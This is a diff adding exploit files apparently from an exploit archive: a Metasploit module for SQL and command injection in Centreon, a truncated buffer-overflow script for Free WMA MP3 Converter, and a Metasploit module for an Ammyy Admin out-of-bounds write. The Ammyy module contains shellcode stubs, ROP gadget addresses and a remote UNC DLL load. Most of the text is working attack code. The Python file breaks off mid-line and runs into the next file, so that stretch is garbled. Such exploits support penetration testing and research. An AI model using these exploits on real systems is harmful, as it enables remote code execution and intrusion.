b/platforms/unix/remote/35078.rb @@ -0,0 +1,139 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Centreon SQL and Command Injection', + 'Description' => %q{ + This module exploits several vulnerabilities on Centreon 2.5.1 and prior and Centreon + Enterprise Server 2.2 and prior. Due to a combination of SQL injection and command + injection in the displayServiceStatus.php component, it is possible to execute arbitrary + commands as long as there is a valid session registered in the centreon.session table. + In order to have a valid session, all it takes is a successful login from anybody. + The exploit itself does not require any authentication. + + This module has been tested successfully on Centreon Enterprise Server 2.2. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'MaZ', # Vulnerability Discovery and Analysis + 'juan vazquez' # Metasploit Module + ], + 'References' => + [ + ['CVE', '2014-3828'], + ['CVE', '2014-3829'], + ['US-CERT-VU', '298796'], + ['URL', 'http://seclists.org/fulldisclosure/2014/Oct/78'] + ], + 'Arch' => ARCH_CMD, + 'Platform' => 'unix', + 'Payload' => + { + 'Space' => 1500, # having into account 8192 as max URI length + 'DisableNops' => true, + 'Compat' => + { + 'PayloadType' => 'cmd cmd_bash', + 'RequiredCmd' => 'generic python gawk bash-tcp netcat ruby openssl' + } + }, + 'Targets' => + [ + ['Centreon Enterprise Server 2.2', {}] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Oct 15 2014', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI of the Centreon Application', '/centreon']) + ], self.class) + end + + def check + random_id = rand_text_numeric(5 + rand(8)) + res = send_session_id(random_id) + + unless res && res.code == 200 && res.headers['Content-Type'] && res.headers['Content-Type'] == 'image/gif' + return Exploit::CheckCode::Safe + end + + injection = "#{random_id}' or 'a'='a" + res = send_session_id(injection) + + if res && res.code == 200 + if res.body && res.body.to_s =~ /sh: graph: command not found/ + return Exploit::CheckCode::Vulnerable + elsif res.headers['Content-Type'] && res.headers['Content-Type'] == 'image/gif' + return Exploit::CheckCode::Detected + end + end + + Exploit::CheckCode::Safe + end + + def exploit + if check == Exploit::CheckCode::Safe + fail_with(Failure::NotVulnerable, "#{peer} - The SQLi cannot be exploited") + elsif check == Exploit::CheckCode::Detected + fail_with(Failure::Unknown, "#{peer} - The SQLi cannot be exploited. Possibly because there's nothing in the centreon.session table. Perhaps try again later?") + end + + print_status("#{peer} - Exploiting...") + random_id = rand_text_numeric(5 + rand(8)) + random_char = rand_text_alphanumeric(1) + session_injection = "#{random_id}' or '#{random_char}'='#{random_char}" + template_injection = "' UNION ALL SELECT 1,2,3,4,5,CHAR(59,#{mysql_payload}59),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- /**" + res = send_template_id(session_injection, template_injection) + + if res && res.body && res.body.to_s =~ /sh: --imgformat: command not found/ + vprint_status("Output: #{res.body}") + end + end + + def send_session_id(session_id) + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.to_s, 'include', 'views', 'graphs', 'graphStatus', 'displayServiceStatus.php'), + 'vars_get' => + { + 'session_id' => session_id + } + ) + + res + end + + def send_template_id(session_id, template_id) + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.to_s, 'include', 'views', 'graphs', 'graphStatus', 'displayServiceStatus.php'), + 'vars_get' => + { + 'session_id' => session_id, + 'template_id' => template_id + } + }, 3) + + res + end + + def mysql_payload + p = '' + payload.encoded.each_byte { |c| p << "#{c},"} + p + end + +end \ No newline at end of file diff --git a/platforms/windows/local/35074.py b/platforms/windows/local/35074.py new file mode 100755 index 000000000..98eca32d3 --- /dev/null +++ b/platforms/windows/local/35074.py @@ -0,0 +1,38 @@ +#!/usr/bin/env python +# Free WMA MP3 Converter 1.8 Buffer Overflow +# Version:1.8 Build 20140226 +# Author:metacom +# Date:10.23.2014 +# Download:http://www.eusing.com/free_wma_converter/mp3_wma_converter.htm +# Tested on:Win7-En 32bit - Win8.1-DE 64bit +import struct +def little_endian(address): + return struct.pack(" 'Ammyy Admin Array Index Out-Of-Bounds', + 'Description' => %q{ + This exploit gains code execution on the controller side of Ammyy Admin from the controlled + side. To do this, it exploits an array index out-of-bounds write. The exploit uses the + relative OOB write to overwrite a return address on the thread stack, which is generally + mapped directly below the Ammyy image data, and retrying on the next thread stack in case + that was not the correct thread. + + There are two targets, one for immediate, direct shellcode execution taking advantage of + the fact that Ammyy does not opt-in to DEP, and the second, using a ROP-only exploit to + call LoadLibraryW with a remote UNC path. + + Since Ammyy Admin uses a crypto library that would be very time-consuming to reproduce and + multiple methods of setting up a connection (relay, direct, etc.) this exploit was written + to simply hook Ammyy Admin from an injected DLL, using its own code to handle the crypto and + connections, substituting the exploit for any data sent to the server. This module will + generate a file (exploit.dat) you must copy, along with aaexploit.exe, to a Windows VM. Run + aaexploit.exe, and wait for a connection. When you hit "accept" on the connection, the + exploit will be sent. + + This module has been tested successfully against Ammyy Admin 3.4 on Windows Vista 32-bit + and Windows 7 32 and 64-bit for direct (IP) connections only. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Matt "scriptjunkie" Weeks ' + ], + 'References' => + [ + [ 'CVE', '2014-XXXX' ], + [ 'OSVDB', 'XXXX' ], + ], + 'Payload' => + { + 'Space' => 800, + 'DisableNops' => true + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Ammyy Admin 3.4 Direct', + { + 'Type' => 'direct', + 'Version' => '3.4' + } + ], + [ 'Ammyy Admin 3.4 Always-On DEP', + { + 'Type' => 'rop', + 'Version' => '3.4' + } + ], + [ 'Ammyy Admin 3.5 Direct', + { + 'Type' => 'direct', + 'Version' => '3.5' + } + ], + [ 'Ammyy Admin 3.5 Always-On DEP', + { + 'Type' => 'rop', + 'Version' => '3.5' + } + ] + ], + 'Privileged' => true, + 'DisclosureDate' => '', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('DLL_PATH', [ false, 'The DLL path to load for the DEP Always-On target.', + '\\\\1.2.3.4\\file.dll']), + OptString.new('FILENAME', [ true, 'The file name.', 'exploit.dat']), + ], self.class) + end + + # Takes a string of binary data, and generates a stroke set in the Ammyy protocol which will + # write that data to the specified col/row point on the remote side, skipping a given pixel if + # specified to avoid overwriting a particular local variable at the wrong time + def strokeSet(col, row, data, skip) + #minus one because the number of strokes is the number of pixels - 1 + numpixels = (data.length + 3) / 4 + numpixels -= 1 if skip != -1 # subtract again if you have a skip + + #03 XoffsetWord YoffsetWord DrawWidthWord DrawHeightWord + output = "\x03" + [col, row, numpixels, 1].pack('vvvv') + output << "XXXX" # end of packet signal to injector + + offset = -1 + #zero pad to 4 byte boundary; any extra is discarded in unpack("V*") + (data + "\x00\x00\x00").unpack('V*').each do |pixel| + offset += 1 + next if skip == offset # don't write this pixel if we're avoiding overwriting a var + + # Get pixel values from this 4-byte chunk + r, g, b, a = [pixel].pack("V").unpack("C*") + + # sanity check pixel value + print_error("Shellcode at pixel #{offset} invalid; has trailing 0") if a != 0 + + # We send pixels in 16 x 1 sections; each of which has its own header (0x1A) + if offset % 0x10 == 0 + # Chunk header; includes flags (0x1A), background color we use to set 1st pixel values, + # and number of strokes (pixels) remaining to send in this chunk + numstrokes = [0xF, numpixels - offset - 1].min + output << [0x1A, r, g, b, numstrokes].pack("C*") + else + # This is a stroke. A stroke can be multiple pixels wide or high, but we're just using + # them to write a single pixel each. Data format looks like this: + + # R G B [low nibble Y offset, high nibble X offset] + # [low nibble stroke height; high nibble stroke width] + + # since we're only using 1x1 strokes, we only set the X offset part of this + output << [r, g, b, (offset % 0x10) << 4, 0].pack("C*") + end + end + output << "XXXX" + output + end + + def exploit + # Injected dll divides packets to send by "XXXX" + # First we specify header data and global flags for the connection. + sploit = "XXXX=XXXX" + sploit << "\x7E\xCC\xF5\xED\xB7\x16\x92\xE2\x96\xBD\xF3\xFF\xC0\xFF\x2D\x97\x69\xF2\xCA\x99" + sploit << "XXXX" + sploit << "\x00\x7F\x00\x00\x00" + sploit << "XXXX" + # send bogus system info + sploit << "\x3A\x00Windows\x006.0.6001 SP1.0\x00U_R_PWNED\x0AJan 01 2014 at 01:23:45\x00\x05" + sploit << "XXXX" + sploit << "\x15" + sploit << "XXXX" + # screen dimensions and stuff + sploit << "\x70\x03\x03\x65\x18\x00\xff\x00\xff\x00\xff\x00\x10\x08\x00\x20\x00\xff\x00\xff\x00" + sploit << "\xff\x00\x10\x08\x00\x20\x03\x58\x02" + sploit << "XXXX" + + if target['Version'] == '3.4' + offsets = { + 'push_esp_ret' => 0x004424a2, + 'pop_ebp_ret' => 0x004488bf, + 'loadlibW' => 0x0044C7B3, + 'pop_edi_ret' => 0x0045aba9, + 'pop_esi_ret' => 0x00460029, + 'pushad_ret' => 0x0045ed48, + 'ret' => 0x00430315 + } + else + offsets = { + 'push_esp_ret' => 0x004786cf, + 'pop_ebp_ret' => 0x00418086, + 'loadlibW' => 0x0044F079, + 'pop_edi_ret' => 0x00471639, + 'pop_esi_ret' => 0x0046003e, + 'pushad_ret' => 0x004615e8, + 'ret' => 0x004012C0 + } + end + + if target['Type'] == 'direct' + # shellcode must be in unicode format + first_payload = payload.encoded + encoder = framework.encoders.create("x86/unicode_mixed") + encoder.datastore.import_options_from_hash( {'BufferRegister'=> 'ESP' }) + unicode_payload = encoder.encode(first_payload, nil, nil, platform) + scode = unicode_payload.unpack("C*").pack("v*") + # actually not, but every 4th byte must be a 0 since we can only write the R G B parts of + # the pixel, and the pixels are stored as R G B A, which ends up being R G B 0, but we + # don't have a generic "every 4th byte must be null" encoder, so we just use the Unicode + # one, which works just fine. + + # First stroke set will write the shellcode at the beginning of the screen buffer + sploit << strokeSet(0, 599, scode, -1) + + # Second write will be an OOB write that will overwrite the return address + # Then calculate address of shellcode and jump to the shellcode + # This will work most of the time + stack = [offsets['push_esp_ret'], # PUSH ESP # RETN in AA_v3.exe + 0x00000000].pack("V*") # not used since ret 4; must be skipped due to local var + stack << "\xB8\x3C\x01\x00\x00" + # mov eax, 0x13C + "\xEB\x01" + # jmp next + "\x00" + # has to be null + "\x01\xC4" + # next: add esp, eax + "\xEB\x00" + # jmp over mandatory null + "\xFF\xE4" # jmp esp + + # Return address is at 0325FEBC, when pixel data starts at 03360000. That's a 0x144 or 324 + # byte OOB overwrite from start of image, which is 81 pixels. So, with an 800x600 screen, + # we use a stroke set with X offset 719 and Y offset 600 (rows go down in address) + sploit << strokeSet(719, 600, stack, 1) + + # Third write will be second trigger, and may work if that fails + # it's pretty much the same thing except add another megabyte (default stack size) to esp + stack = [offsets['push_esp_ret'], # PUSH ESP # RETN in AA_v3.exe + 0x00000000].pack("V*") # not used since ret 4; must be skipped due to local var + stack << "\x81\xC4\x3C\x00\x01\x00" # add esp,0x1003c + "\xEB\x00" # jmp over mandatory null + "\xB8\x00\x01\x00\x00" # mov eax,0x100 + "\xEB\x01" + # jmp next + "\x00" + # has to be null + "\x01\xC4" + # next: add esp, eax + "\xEB\x00" + # jmp over mandatory null + "\xFF\xE4" # jmp esp + + # executing stack is 0x100000 below since default stack size is 1MB (0x100000 bytes); e.g. + # at 0347FEBC when image starts at 03580000. That's 0x40051 (or 262225) pixels back, which + # is 327 rows and then 625 pixels. So our X offset is 175 (AF) and Y offset is 927 + sploit << strokeSet(175, 927, stack, 1) + + elsif target['Type'] == 'rop' + # ROP target is all-in-one write that will overwrite the return address on the stack + # and end up calling LoadLibraryW with a UNC path + stack = [offsets['pop_ebp_ret'], # POP EBP # RETN [AA_v3.exe] + 0x00000000, # not used since ret 4; must be skipped due to local var + offsets['loadlibW'], # address of call LoadLibraryW + offsets['pop_edi_ret'], # POP EDI # RETN [AA_v3.exe] + offsets['ret'], # RETN + offsets['pop_esi_ret'], # POP ESI # RETN + offsets['ret'], # RETN + offsets['pushad_ret'], # PUSHAD # RETN jumps to edi, with esi, ebp, orig esp... above + ].pack("V*") + stack << datastore['DLL_PATH'].unpack("C*").pack("v*") + + # same offset logic as above + sploit << strokeSet(719, 600, stack, 1) + + # second try, same logic as above + sploit << strokeSet(175, 927, stack, 1) + end + + print_status("Creating '#{datastore['FILENAME']}' file ...") + print_status("Now copy that, along with aaexploit.exe, to a Windows VM.") + print_status("Then run aaexploit.exe, and wait for a connection.") + print_status("Hit accept on a connection request to send the exploit.") + + file_create(sploit) + end + +end